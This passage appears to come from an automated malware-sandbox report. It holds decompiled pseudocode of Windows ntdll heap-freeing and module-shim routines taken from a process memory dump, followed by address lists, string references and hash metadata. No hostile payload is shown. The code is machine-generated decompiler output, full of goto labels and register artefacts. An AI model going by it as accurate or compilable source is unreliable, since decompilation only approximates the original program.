				if(_t409 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t409[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L7:
					_t380 = _a4;
					goto L8;
				} else {
					if( *(__ecx + 0x4c) != 0) {
						 *_t409 =  *_t409 ^  *(__ecx + 0x50);
						if(_t409[1] != (_t409[0] ^  *_t409 ^ _t409[1])) {
							_push(__ecx);
							E1F07D646(__edx, __ecx, _t409, _t409, __ecx, __eflags);
						}
					}
					_t259 = _a8;
					_v5 = _t259;
					if(_t259 != 0) {
						_t396 = _t319[6];
						_t355 =  &(_t319[4]);
						_t260 =  *_t355;
						_v12 = _t260;
						_v16 = _t396;
						_t261 =  *((intOrPtr*)(_t260 + 4));
						__eflags =  *_t396 - _t261;
						if( *_t396 != _t261) {
							L59:
							_push(0);
							_push( *_t396);
							_push(_t261);
							_push(_t355);
							_t356 = 0xd;
							E1F085FED(_t356, _t416);
							L60:
							_v5 = 0;
							goto L5;
						}
						__eflags =  *_t396 - _t355;
						if( *_t396 != _t355) {
							goto L59;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
						_t403 =  *(_t416 + 0xb4);
						__eflags = _t403;
						if(_t403 == 0) {
							L46:
							_t368 = _v16;
							_t291 = _v12;
							 *_t368 = _t291;
							 *((intOrPtr*)(_t291 + 4)) = _t368;
							__eflags = _t319[1] & 0x00000008;
							if((_t319[1] & 0x00000008) == 0) {
								L49:
								_t369 = _t319[1];
								__eflags = _t369 & 0x00000004;
								if((_t369 & 0x00000004) != 0) {
									_t293 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t293;
									__eflags = _t369 & 0x00000002;
									if((_t369 & 0x00000002) != 0) {
										__eflags = _t293 - 4;
										if(_t293 > 4) {
											_t293 = _t293 - 4;
											__eflags = _t293;
											_v12 = _t293;
										}
									}
									_t295 = E1F0180A0( &(_t319[8]), _t293, 0xfeeefeee);
									_v16 = _t295;
									__eflags = _t295 - _v12;
									if(_t295 != _v12) {
										_t370 =  *[fs:0x30];
										__eflags =  *(_t370 + 0xc);
										if( *(_t370 + 0xc) == 0) {
											_push("HEAP: ");
											E1EFBB910();
										} else {
											E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t319);
										E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
										_t301 =  *[fs:0x30];
										_t419 = _t419 + 0xc;
										__eflags =  *((char*)(_t301 + 2));
										if( *((char*)(_t301 + 2)) != 0) {
											 *0x1f0b47a1 = 1;
											asm("int3");
											 *0x1f0b47a1 = 0;
										}
									}
								}
								goto L60;
							}
							_t305 = E1EFBF5C7(_t416, _t319);
							__eflags = _t305;
							if(_t305 != 0) {
								goto L49;
							}
							E1EFBF113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
							goto L60;
						}
						_t377 =  *_t319 & 0x0000ffff;
						while(1) {
							__eflags = _t377 -  *((intOrPtr*)(_t403 + 4));
							if(_t377 <  *((intOrPtr*)(_t403 + 4))) {
								break;
							}
							_t308 =  *_t403;
							__eflags = _t308;
							if(_t308 == 0) {
								_t310 =  *((intOrPtr*)(_t403 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t403 + 4)) - 1;
								L45:
								E1EFD036A(_t416, _t403, 1,  &(_t319[4]), _t310, _t377);
								goto L46;
							}
							_t403 = _t308;
						}
						_t310 = _t377;
						goto L45;
					}
					L5:
					_t398 = _t409[6];
					_t357 =  &(_t409[4]);
					_t263 =  *_t357;
					_v12 = _t263;
					_v20 = _t398;
					_t264 =  *((intOrPtr*)(_t263 + 4));
					if( *_t398 == _t264) {
						__eflags =  *_t398 - _t357;
						if( *_t398 != _t357) {
							goto L6;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t409 & 0x0000ffff);
						_t400 =  *(_t416 + 0xb4);
						__eflags = _t400;
						if(_t400 == 0) {
							L21:
							_t358 = _v20;
							_t267 = _v12;
							 *_t358 = _t267;
							 *(_t267 + 4) = _t358;
							__eflags = _t409[1] & 0x00000008;
							if((_t409[1] & 0x00000008) != 0) {
								_t268 = E1EFBF5C7(_t416, _t409);
								__eflags = _t268;
								if(_t268 != 0) {
									goto L22;
								}
								_t322 = _t416;
								E1EFBF113(_t322, _t409,  *_t409 & 0x0000ffff, 1);
								goto L7;
							}
							L22:
							_t360 = _t409[1];
							__eflags = _t360 & 0x00000004;
							if((_t360 & 0x00000004) != 0) {
								_t321 = ( *_t409 & 0x0000ffff) * 8 - 0x10;
								__eflags = _t360 & 0x00000002;
								if((_t360 & 0x00000002) != 0) {
									__eflags = _t321 - 4;
									if(_t321 > 4) {
										_t321 = _t321 - 4;
									}
								}
								_t271 = E1F0180A0( &(_t409[8]), _t321, 0xfeeefeee);
								_v20 = _t271;
								__eflags = _t271 - _t321;
								if(_t271 != _t321) {
									_t362 =  *[fs:0x30];
									__eflags =  *(_t362 + 0xc);
									if( *(_t362 + 0xc) != 0) {
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
										E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									} else {
										_push("HEAP: ");
										E1EFBB910();
									}
									_push(_v20 + 0x10 + _t409);
									E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t409);
									_t282 =  *[fs:0x30];
									_t419 = _t419 + 0xc;
									__eflags =  *((char*)(_t282 + 2));
									if( *((char*)(_t282 + 2)) != 0) {
										 *0x1f0b47a1 = 1;
										asm("int3");
										 *0x1f0b47a1 = 0;
									}
								}
							}
							_t380 = _a4;
							_t319 = _t409;
							_t409[1] = 0;
							_t409[3] = 0;
							 *_t380 =  *_t380 + ( *_t409 & 0x0000ffff);
							 *_t409 =  *_t380;
							_t322 =  *_t380 ^  *(_t416 + 0x54);
							 *(_t409 + 4 +  *_t380 * 8) = _t322;
							L8:
							_t410 = _t319 +  *_t380 * 8;
							if( *(_t416 + 0x4c) == 0) {
								L10:
								while((( *(_t416 + 0x4c) >> 0x00000014 &  *(_t416 + 0x52) ^ _t410[0]) & 0x00000001) == 0) {
									__eflags =  *(_t416 + 0x4c);
									if( *(_t416 + 0x4c) != 0) {
										 *_t410 =  *_t410 ^  *(_t416 + 0x50);
										__eflags = _t410[0] - (_t410[0] ^  *_t410 ^ _t410[0]);
										if(__eflags != 0) {
											_push(_t322);
											E1F07D646(_t319, _t416, _t410, _t410, _t416, __eflags);
										}
									}
									__eflags = _v5;
									if(_v5 == 0) {
										L94:
										_t381 = _t410[3];
										_t323 =  &(_t410[2]);
										_t192 =  *_t323;
										_v20 = _t192;
										_v16 = _t381;
										_t193 =  *((intOrPtr*)(_t192 + 4));
										__eflags =  *_t381 - _t193;
										if( *_t381 != _t193) {
											L63:
											_push(0);
											_push( *_t381);
											_push(_t193);
											_push(_t323);
											_push(0xd);
											L64:
											_pop(_t322);
											E1F085FED(_t322, _t416);
											continue;
										}
										__eflags =  *_t381 - _t323;
										if( *_t381 != _t323) {
											goto L63;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t410 & 0x0000ffff);
										_t389 =  *(_t416 + 0xb4);
										__eflags = _t389;
										if(_t389 == 0) {
											L104:
											_t339 = _v16;
											_t196 = _v20;
											 *_t339 = _t196;
											 *(_t196 + 4) = _t339;
											__eflags = _t410[0] & 0x00000008;
											if((_t410[0] & 0x00000008) == 0) {
												L107:
												_t340 = _t410[0];
												__eflags = _t340 & 0x00000004;
												if((_t340 & 0x00000004) != 0) {
													_t202 = ( *_t410 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t202;
													__eflags = _t340 & 0x00000002;
													if((_t340 & 0x00000002) != 0) {
														__eflags = _t202 - 4;
														if(_t202 > 4) {
															_t202 = _t202 - 4;
															__eflags = _t202;
															_v12 = _t202;
														}
													}
													_t203 = E1F0180A0( &(_t410[4]), _t202, 0xfeeefeee);
													_v20 = _t203;
													__eflags = _t203 - _v12;
													if(_t203 != _v12) {
														_t344 =  *[fs:0x30];
														__eflags =  *(_t344 + 0xc);
														if( *(_t344 + 0xc) == 0) {
															_push("HEAP: ");
															E1EFBB910();
														} else {
															E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t410);
														E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t410);
														_t209 =  *[fs:0x30];
														__eflags =  *((char*)(_t209 + 2));
														if( *((char*)(_t209 + 2)) != 0) {
															 *0x1f0b47a1 = 1;
															asm("int3");
															 *0x1f0b47a1 = 0;
														}
													}
												}
												_t390 = _a4;
												_t319[1] = 0;
												_t319[3] = 0;
												 *_t390 =  *_t390 + ( *_t410 & 0x0000ffff);
												 *_t319 =  *_t390;
												 *(_t319 + 4 +  *_t390 * 8) =  *_t390 ^  *(_t416 + 0x54);
												break;
											}
											_t213 = E1EFBF5C7(_t416, _t410);
											__eflags = _t213;
											if(_t213 != 0) {
												goto L107;
											}
											_t322 = _t416;
											E1EFBF113(_t322, _t410,  *_t410 & 0x0000ffff, 1);
											continue;
										}
										_t350 =  *_t410 & 0x0000ffff;
										while(1) {
											__eflags = _t350 -  *((intOrPtr*)(_t389 + 4));
											if(_t350 <  *((intOrPtr*)(_t389 + 4))) {
												break;
											}
											_t216 =  *_t389;
											__eflags = _t216;
											if(_t216 == 0) {
												_t218 =  *((intOrPtr*)(_t389 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t389 + 4)) - 1;
												L103:
												E1EFD036A(_t416, _t389, 1,  &(_t410[2]), _t218, _t350);
												goto L104;
											}
											_t389 = _t216;
										}
										_t218 = _t350;
										goto L103;
									} else {
										_t383 = _t319[6];
										_t324 =  &(_t319[4]);
										_t221 =  *_t324;
										_v20 = _t221;
										_v16 = _t383;
										_t222 =  *((intOrPtr*)(_t221 + 4));
										__eflags =  *_t383 - _t222;
										if( *_t383 != _t222) {
											L92:
											_push(0);
											_push( *_t383);
											_push(_t222);
											_push(_t324);
											_t325 = 0xd;
											E1F085FED(_t325, _t416);
											L93:
											_v5 = 0;
											goto L94;
										}
										__eflags =  *_t383 - _t324;
										if( *_t383 != _t324) {
											goto L92;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
										_t385 =  *(_t416 + 0xb4);
										__eflags = _t385;
										if(_t385 == 0) {
											L79:
											_t326 = _v16;
											_t225 = _v20;
											 *_t326 = _t225;
											 *(_t225 + 4) = _t326;
											__eflags = _t319[1] & 0x00000008;
											if((_t319[1] & 0x00000008) == 0) {
												L82:
												_t327 = _t319[1];
												__eflags = _t327 & 0x00000004;
												if((_t327 & 0x00000004) != 0) {
													_t227 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t227;
													__eflags = _t327 & 0x00000002;
													if((_t327 & 0x00000002) != 0) {
														__eflags = _t227 - 4;
														if(_t227 > 4) {
															_t227 = _t227 - 4;
															__eflags = _t227;
															_v12 = _t227;
														}
													}
													_t228 = E1F0180A0( &(_t319[8]), _t227, 0xfeeefeee);
													_v20 = _t228;
													__eflags = _t228 - _v12;
													if(_t228 != _v12) {
														_t329 =  *[fs:0x30];
														__eflags =  *(_t329 + 0xc);
														if( *(_t329 + 0xc) == 0) {
															_push("HEAP: ");
															E1EFBB910();
														} else {
															E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t319);
														E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
														_t234 =  *[fs:0x30];
														_t419 = _t419 + 0xc;
														__eflags =  *((char*)(_t234 + 2));
														if( *((char*)(_t234 + 2)) != 0) {
															 *0x1f0b47a1 = 1;
															asm("int3");
															 *0x1f0b47a1 = 0;
														}
													}
												}
												goto L93;
											}
											_t238 = E1EFBF5C7(_t416, _t319);
											__eflags = _t238;
											if(_t238 != 0) {
												goto L82;
											}
											E1EFBF113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
											goto L93;
										}
										_t336 =  *_t319 & 0x0000ffff;
										while(1) {
											__eflags = _t336 -  *((intOrPtr*)(_t385 + 4));
											if(_t336 <  *((intOrPtr*)(_t385 + 4))) {
												break;
											}
											_t241 =  *_t385;
											__eflags = _t241;
											if(_t241 == 0) {
												_t243 =  *((intOrPtr*)(_t385 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t385 + 4)) - 1;
												L78:
												E1EFD036A(_t416, _t385, 1,  &(_t319[4]), _t243, _t336);
												goto L79;
											}
											_t385 = _t241;
										}
										_t243 = _t336;
										goto L78;
									}
								}
								return _t319;
							}
							_t251 =  *_t410;
							_t394 =  *(_t416 + 0x50) ^ _t251;
							_v28 = _t251;
							_v28 = _t394;
							_t322 = _t394 >> 0x00000010 ^ _t394 >> 0x00000008 ^ _t394;
							if(_t394 >> 0x18 != _t322) {
								_push(0);
								_push(0);
								_push(0);
								_push(_t410);
								_push(3);
								goto L64;
							}
							goto L10;
						} else {
							_t286 =  *_t409 & 0x0000ffff;
							_v16 = _t286;
							while(1) {
								__eflags = _t286 -  *((intOrPtr*)(_t400 + 4));
								if(_t286 <  *((intOrPtr*)(_t400 + 4))) {
									break;
								}
								_t288 =  *_t400;
								__eflags = _t288;
								if(_t288 == 0) {
									_t286 =  *((intOrPtr*)(_t400 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t400 + 4)) - 1;
									break;
								} else {
									_t400 = _t288;
									_t286 =  *_t409 & 0x0000ffff;
									continue;
								}
							}
							E1EFD036A(_t416, _t400, 1, _t357, _t286, _v16);
							goto L21;
						}
					}
					L6:
					_push(0);
					_push( *_t398);
					_push(_t264);
					_push(_t357);
					_t322 = 0xd;
					E1F085FED(_t322, _t416);
					goto L7;
				}
			}

0x1efd1eb2
0x1efd1ebb
0x1efd1ebf
0x1efd1ece
0x1efd1ed0
0x1efd1ed4
0x1efd1f91
0x1efd1f3d
0x1efd1f3d
0x00000000
0x1efd1eee
0x1efd1ef2
0x1efd1ef7
0x1efd1f04
0x1f025b5c
0x1f025b5f
0x1f025b5f
0x1efd1f04
0x1efd1f0a
0x1efd1f0d
0x1efd1f12
0x1f025b69
0x1f025b6c
0x1f025b6f
0x1f025b71
0x1f025b74
0x1f025b77
0x1f025b7a
0x1f025b7c
0x1f025c9f
0x1f025c9f
0x1f025ca1
0x1f025ca5
0x1f025ca6
0x1f025ca9
0x1f025caa
0x1f025caf
0x1f025caf
0x00000000
0x1f025caf
0x1f025b82
0x1f025b84
0x00000000
0x00000000
0x1f025b8d
0x1f025b90
0x1f025b96
0x1f025b98
0x1f025bc3
0x1f025bc3
0x1f025bc6
0x1f025bc9
0x1f025bcb
0x1f025bce
0x1f025bd2
0x1f025bf5
0x1f025bf5
0x1f025bf8
0x1f025bfb
0x1f025c04
0x1f025c0b
0x1f025c0e
0x1f025c11
0x1f025c13
0x1f025c16
0x1f025c18
0x1f025c18
0x1f025c1b
0x1f025c1b
0x1f025c16
0x1f025c28
0x1f025c2d
0x1f025c30
0x1f025c33
0x1f025c35
0x1f025c3c
0x1f025c40
0x1f025c60
0x1f025c65
0x1f025c42
0x1f025c58
0x1f025c5d
0x1f025c73
0x1f025c7a
0x1f025c7f
0x1f025c85
0x1f025c88
0x1f025c8c
0x1f025c8e
0x1f025c95
0x1f025c96
0x1f025c96
0x1f025c8c
0x1f025c33
0x00000000
0x1f025bfb
0x1f025bd8
0x1f025bdd
0x1f025bdf
0x00000000
0x00000000
0x1f025beb
0x00000000
0x1f025beb
0x1f025b9a
0x1f025ba7
0x1f025ba7
0x1f025baa
0x00000000
0x00000000
0x1f025b9f
0x1f025ba1
0x1f025ba3
0x1f025bb3
0x1f025bb3
0x1f025bb4
0x1f025bbe
0x00000000
0x1f025bbe
0x1f025ba5
0x1f025ba5
0x1f025bac
0x00000000
0x1f025bac
0x1efd1f18
0x1efd1f18
0x1efd1f1b
0x1efd1f1e
0x1efd1f20
0x1efd1f23
0x1efd1f26
0x1efd1f2b
0x1efd1f96
0x1efd1f98
0x00000000
0x00000000
0x1efd1f9d
0x1efd1fa0
0x1efd1fa6
0x1efd1fa8
0x1efd1fd4
0x1efd1fd4
0x1efd1fd7
0x1efd1fda
0x1efd1fdc
0x1efd1fdf
0x1efd1fe3
0x1efd20c0
0x1efd20c5
0x1efd20c7
0x00000000
0x00000000
0x1f025cc0
0x1f025cc2
0x00000000
0x1f025cc2
0x1efd1fe9
0x1efd1fe9
0x1efd1fec
0x1efd1fef
0x1efd201f
0x1efd2026
0x1efd2029
0x1efd205a
0x1efd205d
0x1efd205f
0x1efd205f
0x1efd205d
0x1efd2035
0x1efd203a
0x1efd203d
0x1efd203f
0x1efd2041
0x1efd2048
0x1efd204c
0x1efd2071
0x1efd207a
0x1efd204e
0x1efd204e
0x1efd2053
0x1efd2053
0x1efd2089
0x1efd2090
0x1efd2095
0x1efd209b
0x1efd209e
0x1efd20a2
0x1efd20a8
0x1efd20af
0x1efd20b0
0x1efd20b0
0x1efd20a2
0x1efd203f
0x1efd1ff1
0x1efd1ff4
0x1efd1ff9
0x1efd1ffd
0x1efd2001
0x1efd2006
0x1efd200e
0x1efd2012
0x1efd1f40
0x1efd1f46
0x1efd1f49
0x00000000
0x1efd1f71
0x1f025ceb
0x1f025cef
0x1f025cf4
0x1f025cfe
0x1f025d01
0x1f025d03
0x1f025d08
0x1f025d08
0x1f025d01
0x1f025d0d
0x1f025d11
0x1f025e61
0x1f025e61
0x1f025e64
0x1f025e67
0x1f025e69
0x1f025e6c
0x1f025e6f
0x1f025e72
0x1f025e74
0x1f025cd6
0x1f025cd6
0x1f025cd8
0x1f025cda
0x1f025cdb
0x1f025cdc
0x1f025cde
0x1f025ce0
0x1f025ce1
0x00000000
0x1f025ce1
0x1f025e7a
0x1f025e7c
0x00000000
0x00000000
0x1f025e85
0x1f025e88
0x1f025e8e
0x1f025e90
0x1f025ebb
0x1f025ebb
0x1f025ebe
0x1f025ec1
0x1f025ec3
0x1f025ec6
0x1f025eca
0x1f025eed
0x1f025eed
0x1f025ef0
0x1f025ef3
0x1f025efc
0x1f025f03
0x1f025f06
0x1f025f09
0x1f025f0b
0x1f025f0e
0x1f025f10
0x1f025f10
0x1f025f13
0x1f025f13
0x1f025f0e
0x1f025f20
0x1f025f25
0x1f025f28
0x1f025f2b
0x1f025f2d
0x1f025f34
0x1f025f38
0x1f025f58
0x1f025f5d
0x1f025f3a
0x1f025f50
0x1f025f55
0x1f025f6b
0x1f025f72
0x1f025f77
0x1f025f80
0x1f025f84
0x1f025f86
0x1f025f8d
0x1f025f8e
0x1f025f8e
0x1f025f84
0x1f025f2b
0x1f025f95
0x1f025f98
0x1f025f9c
0x1f025fa3
0x1f025fa8
0x1f025fb4
0x00000000
0x1f025fb4
0x1f025ed0
0x1f025ed5
0x1f025ed7
0x00000000
0x00000000
0x1f025ee1
0x1f025ee3
0x00000000
0x1f025ee3
0x1f025e92
0x1f025e9f
0x1f025e9f
0x1f025ea2
0x00000000
0x00000000
0x1f025e97
0x1f025e99
0x1f025e9b
0x1f025eab
0x1f025eab
0x1f025eac
0x1f025eb6
0x00000000
0x1f025eb6
0x1f025e9d
0x1f025e9d
0x1f025ea4
0x00000000
0x1f025d17
0x1f025d17
0x1f025d1a
0x1f025d1d
0x1f025d1f
0x1f025d22
0x1f025d25
0x1f025d28
0x1f025d2a
0x1f025e4d
0x1f025e4d
0x1f025e4f
0x1f025e53
0x1f025e54
0x1f025e57
0x1f025e58
0x1f025e5d
0x1f025e5d
0x00000000
0x1f025e5d
0x1f025d30
0x1f025d32
0x00000000
0x00000000
0x1f025d3b
0x1f025d3e
0x1f025d44
0x1f025d46
0x1f025d71
0x1f025d71
0x1f025d74
0x1f025d77
0x1f025d79
0x1f025d7c
0x1f025d80
0x1f025da3
0x1f025da3
0x1f025da6
0x1f025da9
0x1f025db2
0x1f025db9
0x1f025dbc
0x1f025dbf
0x1f025dc1
0x1f025dc4
0x1f025dc6
0x1f025dc6
0x1f025dc9
0x1f025dc9
0x1f025dc4
0x1f025dd6
0x1f025ddb
0x1f025dde
0x1f025de1
0x1f025de3
0x1f025dea
0x1f025dee
0x1f025e0e
0x1f025e13
0x1f025df0
0x1f025e06
0x1f025e0b
0x1f025e21
0x1f025e28
0x1f025e2d
0x1f025e33
0x1f025e36
0x1f025e3a
0x1f025e3c
0x1f025e43
0x1f025e44
0x1f025e44
0x1f025e3a
0x1f025de1
0x00000000
0x1f025da9
0x1f025d86
0x1f025d8b
0x1f025d8d
0x00000000
0x00000000
0x1f025d99
0x00000000
0x1f025d99
0x1f025d48
0x1f025d55
0x1f025d55
0x1f025d58
0x00000000
0x00000000
0x1f025d4d
0x1f025d4f
0x1f025d51
0x1f025d61
0x1f025d61
0x1f025d62
0x1f025d6c
0x00000000
0x1f025d6c
0x1f025d53
0x1f025d53
0x1f025d5a
0x00000000
0x1f025d5a
0x1f025d11
0x1efd1f8b
0x1efd1f8b
0x1efd1f4b
0x1efd1f50
0x1efd1f52
0x1efd1f57
0x1efd1f64
0x1efd1f6b
0x1f025cce
0x1f025ccf
0x1f025cd0
0x1f025cd1
0x1f025cd2
0x00000000
0x1f025cd2
0x00000000
0x1efd1faa
0x1efd1faa
0x1efd1fad
0x1efd1fb0
0x1efd1fb0
0x1efd1fb3
0x00000000
0x00000000
0x1efd1fb5
0x1efd1fb7
0x1efd1fb9
0x1efd1fc5
0x1efd1fc5
0x00000000
0x1efd1fbb
0x1efd1fbb
0x1efd1fbd
0x00000000
0x1efd1fbd
0x1efd1fb9
0x1efd1fcf
0x00000000
0x1efd1fcf
0x1efd1fa8
0x1efd1f2d
0x1efd1f2d
0x1efd1f2f
0x1efd1f33
0x1efd1f34
0x1efd1f37
0x1efd1f38
0x00000000
0x1efd1f38

Strings

HEAP: , xrefs: 1EFD204E, 1F025C60, 1F025E0E, 1F025F58
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1EFD208B, 1F025C75, 1F025E23, 1F025F6D
HEAP[%wZ]: , xrefs: 1EFD2075, 1F025C53, 1F025E01, 1F025F4B

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: fc674b3574f229e8bac26f9446d72bd95de33a2f9faadc70cc38295713c5a4e3
Instruction ID: 638d7889ed43d4573151cb974ac4591a1cfdf714f901e083053df4cda6f83304
Opcode Fuzzy Hash: fc674b3574f229e8bac26f9446d72bd95de33a2f9faadc70cc38295713c5a4e3
Instruction Fuzzy Hash: 59222674600246DFEB15CF24C4A0BBABBF5FF85704F548699E8468B381E736E985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1EFE0AEB Relevance: 4.0, Strings: 3, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E1EFE0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1f0b68d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1f0b65f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1EFF7550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1EFCFED0(0x1f0b32d8);
					if( *0x1f0b65f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1f0b9218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1f0b32d8);
						E1EFCE740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1EFB6DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1EFC98DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1f0b65f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1f0b91e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1EFE1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1f0b68d8;
									if( *0x1f0b68d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x1f0b5d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1EFD5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1f0b68d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1F0088C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1f0b68d8 = _v24;
											 *0x1f0b5d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1f0b5d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1F0088C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1F0088C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1f0b68d8);
										goto L39;
									} else {
										_t101 =  *0x1f0b37c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1F03E692();
											_t101 =  *0x1f0b37c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1EFE0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1EFDDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}

0x1efe0af6
0x1efe0af8
0x1efe0afa
0x1efe0afd
0x1efe0b00
0x1efe0b06
